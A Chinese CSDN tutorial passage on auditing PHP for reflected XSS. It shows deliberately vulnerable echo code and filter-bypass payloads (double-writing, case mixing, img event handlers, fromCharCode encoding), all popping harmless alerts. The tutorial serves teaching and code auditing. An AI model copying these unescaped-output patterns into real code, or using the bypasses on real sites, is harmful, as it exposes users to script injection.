php代码审计【6】反射型xss

最新推荐文章于 2024-06-27 14:01:14 发布
最新推荐文章于 2024-06-27 14:01:14 发布
阅读量542 收藏 1
点赞数
分类专栏: # php代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/106869548
版权

一、对变量直接输出

例如:

<?php
echo$_GET['xss'];  //接受的参数可以直接进行xss
?>

这里通过GET方式传过去xss参数,并且对传过去的参数没有做任何过滤,我们的输入会在页面进行显示。现在我们输入恶意代码<script>alert(1)</script>XSS弹出弹框

浏览器(火狐,谷歌默认有防护):

二:$_SERVER变量参数
(1)$_SERVER['PHP_SELF']

   测试代码:

<?php
echo $_SERVER['PHP_SELF'];  //直接输出自己的文件名
?>

 浏览器:

(2)$_SERVER['HTTP_USER_AGENT']

  此函数作用是获取浏览器信息

<?php
echo $_SERVER['HTTP_USER_AGENT'];  输出agent
?>

 

可以用Bp抓包改包或者通过火狐插件Modify headers 修改User-Agent:的内容就行了 

<?php
//echo $_GET['xss'];  //变量的直接输出导致xss
//echo getenv('REMOTE_ADDR');  //远程iP
//echo $_SERVER['PHP_SELF'];  //显示自己路径
//echo $_SERVER['HTTP_USER_AGENT'];
echo $_SERVER['HTTP_REFERER']; //输出referer
//echo urldecode($_SERVER['REQUESR_URI']);  //因为URI会进行编码,所以需要重新解码
?>

三、绕过分析

1、过滤<script>,</script> ,

<?php
    $xss = $_GET["xss"];
    $xss = preg_replace("/<script>/", "", $xss);
    $xss = preg_replace("/<\/script>/", "", $xss);
    echo $_GET["xss"];
?>

直接通过双写或者大小写可以绕过

preg_replace()函数如果检测到<script></script>就会把其替换为空格(只替换小写的)。
但这里并没有迭代替换,所以这里可以双写绕过也可以大小写绕过。
即payload<scr<script>ipt>alert('test')</s</script>cript><scRipt>alert('test')</scRipt>

2、过滤大小写

<?php
    $xss = $_GET["xss"];
    $xss = preg_replace("/<script>/i", "", $xss);
    $xss = preg_replace("/<\/script>/i", "", $xss);
    echo $_GET["xss"];
?>

这里还是用了preg_replace()函数,只不过这里替换时不区分大小写,所以这里我们不能用大小写绕过了,但我们还是可以用双写绕过的

3、匹配到script 就die。

<?php
if (preg_match('/script/i', $_GET["name"])){
    die("error");
}
?>
<?php echo $_GET["name"]; ?>

,这里用了preg_match()函数, 只要在获取的参数中含有script字符串即报错。这里我们可以使用img标签来绕过,img src调用图片失败然后执行后面的动作。payload为<img src=""onclick="alert('chenie')">,此处要点击图片会触发

4、alert 被过滤

<?php
if (preg_match('/alert/i', $_GET["name"])){
    die("error");
}
?>
<?php echo $_GET["name"]; ?>

考虑编码(ascii 编码)

参数:name=<script>eval(String.fromCharCode(97,108,101,114,116,40,39,99,104,101,110,105,101,39,41))</script>

所有十进制可以查看ascii对应的结果。

 

司徒荆
关注
专栏目录
通过代码审计找出网站中的XSS漏洞实战
01-27
在模板中搜索`bk`,发现同样没有进行安全过滤,存在反射XSS的风险。 三、反向审计 反向审计从模板中的变量出发,追溯其来源。利用编辑器的正则表达式匹配输出变量,如`echo $zhangsan`,找到变量`$keyword`的...
fastadmin采坑之htmlentities
很阔爱的博客
08-03 276
fastadmin中很多html文件中有{htmlentities} ,其中htmlentities 代表什么意思。这是一个过滤函数,防止xss跨站脚本攻击。
php反射xss,【DVWA(四)】XXS反射跨站攻击
weixin_39805539的博客
04-01 319
XXS反射跨站攻击(Reflected Cross Site Scripting)概要:跨站攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cooki...
【漏洞复现】FastAdmin——lang——任意文件读取漏洞
最新发布
LongL_GuYu的博客
06-27 1795
FastAdmin是一个免费开源的后台管理框架,其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
XSS跨站脚本攻击之——反射XSS(post)获取用户密码
温柔小薛的博客
04-05 2546
反射XSS(post)获取用户密码 跟反射(get)的不同之处 post是无法在URL中插入payload的 是需要插入内容到数据包的 那么如何将数据包这种类的攻击发送给用户呢 通过html页面方式提交,构造一个自己的post 丢到自己的网站上 getxss是直接更改URL就可以了,可以直接在参数后加payload pikachu\pkxss\xcook...
PHP_JavaScript核心编程-正则表达式(4)
魔法革1996
08-22 360
回顾 有一个东西,就是因为它,使得它所在的作用域不被释放,它是就是闭包。 0、目标 1、能够掌握正则表达式的语法(涉及到的内容,最起码会查手册) 2、能够理解什么是捕获和引用 3、能够匹配中文 4、能够查阅正则对象中内置的方法 5、能够查阅字符串对象中支持正则的方法 6、能够在PHP中使用正则 一、概述 w3c手册位置:上面的JavaScript --- 左侧的JavaScript --- 右侧的参考书 --- 左侧的JS RegExp 或者:上面的JavaSc.
bluecms源码 初级代码审计
07-31
3. **XSS防护**:确保对用户输入进行了适当的过滤或转义,防止反射或存储XSS攻击。 4. **权限检查**:验证用户访问控制逻辑是否正确,防止权限越权。 5. **代码规范**:遵循良好的编程习惯,减少逻辑错误和安全...
代码审计与Web安全实验合集
06-16
2. 防止跨站脚本(XSS):理解不同类XSS攻击,如存储反射和DOM,并学习如何正确地编码和验证用户输入。 3. 验证输入:确保所有用户输入都经过验证,防止未预期的数据导致的安全问题。 4. 使用安全的函数...
PHPXSS跨站攻击的防范
10-30
2. **反射XSS**:恶意脚本通过URL参数传入,当受害者点击恶意链接时触发。 3. **DOMXSS**:这种类XSS利用了前端JavaScript处理数据的方式,通过修改页面DOM节点来注入恶意脚本。 #### 三、XSS攻击实例 在...
87.网络安全渗透测试—[常规漏洞挖掘与利用篇3]—[xss测试-10种绕过技巧]
qwsn
01-26 4885
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss测试-10种绕过技巧 1、大小写绕过:`script标签一次匹配` 2、复写绕过(属性多余):`script大小写标签一次匹配` 3、转换标签绕过:`sciprt标签禁用` 4、转换方法绕过:alert方法禁用 5、手工闭合绕过:`既定的script标签` 6、手工闭合+单引号绕过:既定的scirpt标签+htmllentities默认参数 7、dom输出+hash属性+substring方法-弹窗: 8、ph
php 正则 匹配任意字符,PHP和JavaScript正则匹配所有字符(包括换行符)的差异
weixin_33783283的博客
03-10 369
PHP和JavaScript中,正则表达式匹配所有字符(包含换行符)是不一样的。假设有这样的字符串:Hello,PHP,JavaScript现在,我们要从里面中找出后面两行,也就是多行查找。1 PHP实现在PHP中,这样写:$str = 'Hello,PHP,JavaScript';$find = '';preg_match('/PHP.*?Script/is', $str, $find);pr...
php反射xss,反射XSS测试及修复
weixin_28744613的博客
04-01 1372
反射XSS一般出现的位置,如GET参数中测试搜索功能F12查看源码,查找出现1111的位置第一个位置在title处尝试闭合掉title标签,然后测试JS代码,成功弹窗查看源码,XSS执行第二处位置在搜索框,此处XSS无法执行,因为位于value属性内,需要将其闭合测试时注意闭合掉多余的双引号”接下来对XSS漏洞进行源码修复第一处XSS在title位置,输入的搜索参数ks直接echo输出,没有进行...
对CI_Security类的注释
辛星,前进的路上.
07-14 816
defined('BASEPATH') OR exit('No direct script access allowed'); //安全类 class CI_Security { /** * 需要清理的字符 * * @var array */ public $filename_bad_chars = array( '../', '', '', "'", '
PHP网页xss攻击测试用例,PHP web项目进行XSS漏洞测试中存在的问题
weixin_32058239的博客
03-22 205
概念:跨站脚本攻击(XSS)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。我们可以将其分成三类:(1)反射XSS: 攻击者事先制作好攻击链...
php反射xss,利用反射XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 761
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
关于XSS攻击及其防御
Wang的专栏
06-04 3856
【代码】关于XSS攻击及其防御。
【DVWA系列】十一、XSS(Reflected) 反射XSS(源码分析&漏洞利用)
Pluto.的博客
03-12 1133
文章目录DVWAXSS(Reflected) 反射XSS一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA XSS(Reflected) 反射XSS 一、Low 级别 没有任何的安全防护措施 输入 <script>alert('hack')</script>,直接就执行了我们的 js 代码: 我们的js代码直接插入到了网页源代码中: 源代码: <?php header ("X-XSS-Protection: 0");
DVWA中的反射XSS攻击实战解析
"该资源是关于网络安全的演示文档,重点介绍了反射XSS攻击的概念、原理及在DVWA(Damn Vulnerable Web Application)平台上进行的攻击步骤。文档详细阐述了如何在不同安全级别的DVWA中执行初级、中级和高级的反射...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值